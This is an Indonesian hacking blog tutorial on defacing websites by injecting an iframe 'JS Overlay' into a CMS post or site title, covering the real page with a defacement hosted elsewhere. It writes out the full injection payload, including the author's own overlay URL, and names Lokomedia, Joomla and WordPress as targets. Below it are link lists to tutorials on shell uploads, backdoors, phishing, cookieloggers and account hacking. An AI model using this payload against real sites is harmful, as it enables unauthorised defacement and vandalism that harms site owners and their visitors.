1 Tutorial Deface Dengan JS Overlay (mudah kok )

Kali ini saya akan share teknik deface yang "jarang" digunakan karena ini mungkin menjadi alternatif terakhir jika kita gagal memasang shell pada web target. Ada kalanya sebuah web tidak support file php [kalo ini masih bisa di tamper], atau Web tersebut tidak menyediakan fasilitas upload.

Lalu bagaimana solusinya agar kita bisa men-deface web tersebut ? Dengan JS Overlay. Sistem kerjanya berbeda dengan teknik deface yang didahului dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli web tersebut "ditimpa" oleh halaman deface yang kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ?

Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain. Jika sebelumnya belum pernah melakukan deface, kalian bisa membuat web/blog sendiri, dideface sendiri hanya sebagai "umpan" dari JS Overlay.

Sebagai contoh, target kita kali ini adalah Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berkali-kali tidak bisa. Mungkin sudah diantisipasi oleh Webmasternya. Makanya saya coba menggunakan metode JS Overlay.

Oke, kita mulai tutorialnya :

Login ke web target. Buat post baru/kalian bisa mengedit judul/nama dari web tersebut.

Masukkan script ini di bagian judul :

<center><iframe src='[situs yang pernah dideface]' height='820px' width='1100px' scrolling='no' frameborder='0'></center>

Untuk tulisan berwarna merah silahkan diganti dengan url kalian sendiri. Intinya kita memanggil script dari url tersebut untuk menutupi halaman yang akan kita deface.

Untuk contoh, ini script saya :

<center><iframe src='http://personal-jsoverlay.blogspot.com/' height='820px' width='1100px' scrolling='no' frameborder='0'></center>

Lalu klik save.
Done. Kita lihat..

Teknik ini [sepertinya] bisa digunakan di semua CMS. Entah itu Lokomedia, Joomla, WP, dll.

Kekurangan dari teknik ini adalah kita hanya punya sekali akses ke web korban karena kita tidak bisa menanam backdoor.

Tutorial ini hanya sebagai pembelajaran. Gunakan sebaik-baiknya.

Artikel Terkait :

Shell Hacking

• Tutorial Upload Shell Backdoor di CMS vBulletin
• CREATE A COOKIELOGGER TO HACK ANY ACCOUNT
• How to Install Kali linux Step by Step Guide
• Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability
• Fake FB inbox bomber
• Deface Dgn Mudah Menggunaka Bugs Zen Cart
• Pengertian RFI,LFI,LFD ( Full Tutorial Deface )
• Cara Deface Web Dengan CSRF
• Cara Deface Web Dengan SQL Manual
• Sql Injection Via Perl ( Full Tutorial )
• Trick Hack Facebook 2013
• Bypass Symlink yang Forbidden
• Exploit Wordpress Blogs
• [tutor] hack joomla versi terbaru
• Cara baypass Config (lengkap video )
• Cara Upload Shell Di wordprees harus Dengan melewati FTP Password
• Alur Web Attack ( Tools Hacking )
• Mencari Cpnel Dengan bantuan DORK
• Deface dengan XSS Vulnerability ( Cara Sederhana )
• wordpress themes store vuln (shell upload) + video
• Cara Upload Backdoor/Shell di Wordpress
• Cara Deface Website Dengan Menggunakan Tools Havij
• Cara Deface Dengan Tamper Data ...
• Deface Website With Spaw Uploads Vulnerability.

tips trick

• Cara mengatasi Error Code: 0x80070570 saat install win 7
• Tutorial Hack Facebook Metode 3 Permintaan Pertemanan
• Tutorial Upload Shell Backdoor di CMS vBulletin
• Cara Mengatasi WiFi Tidak Bisa Connect Pada Samsung Galaxy Ace S583
• Mempercantik Tampilan Terminal Linux
• Mempercantik Tampilan Terminal Linux
• GPG error di Kali Linux
• Add Repository in Kali Linux
• KALI – How to install Flash for Kali Linux – The Visual Guide
• How to Install Kali linux Step by Step Guide
• Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability
• XSS Injection – Jangan Sampai Blog Anda Di Bajak !!!
• Tips Trick Menggunakan google adsense / G.A trick hack
• Deface Dgn Mudah Menggunaka Bugs Zen Cart
• Pengertian RFI,LFI,LFD ( Full Tutorial Deface )
• Trick Hack Facebook 2013
• Bypass Symlink yang Forbidden
• Cara baypass Config (lengkap video )
• Cara membuat Phising Di Site apa aja ( Full tutorial )
• Mencari username dan Password Web ( Seperti Tv one )
• Mencari Cpnel Dengan bantuan DORK
• Tutorial Upload Shell Di CMS Balitbang / Web Sekolahan
• Hack Billing WARNET [NO-SOFTWARE]
• Tutorial Deface Website tertentu menggunakan IP server

Kriminal

• CREATE A COOKIELOGGER TO HACK ANY ACCOUNT
• XSS Injection – Jangan Sampai Blog Anda Di Bajak !!!
• Teknik Exploit Com_Media pada CMS Joomla -
• Fake FB inbox bomber
• Pengertian RFI,LFI,LFD ( Full Tutorial Deface )
• Cara Deface Web Dengan CSRF
• Cara Deface Web Dengan SQL Manual
• Exploit Wordpress Blogs
• [tutor] hack joomla versi terbaru
• Cara Upload Shell Di Joomla Full Tutorial ( 4 Trick )
• Cara membuat Phising Di Site apa aja ( Full tutorial )
• Cara Mengetahui Username Dan password Web Melalui Exploit ( Berlaku pada semua Site )
• Cara Upload Backdoor/Shell di Wordpress
• Cara Deface Website Dengan Menggunakan Tools Havij
• Hack Facebook Menggunakan Trik 3 Teman Terpercaya ....
• Potong jaringan Internet Dengan Netcut
• Bug CMS Lokomedia After Patch
• Logika Hacker dan Carder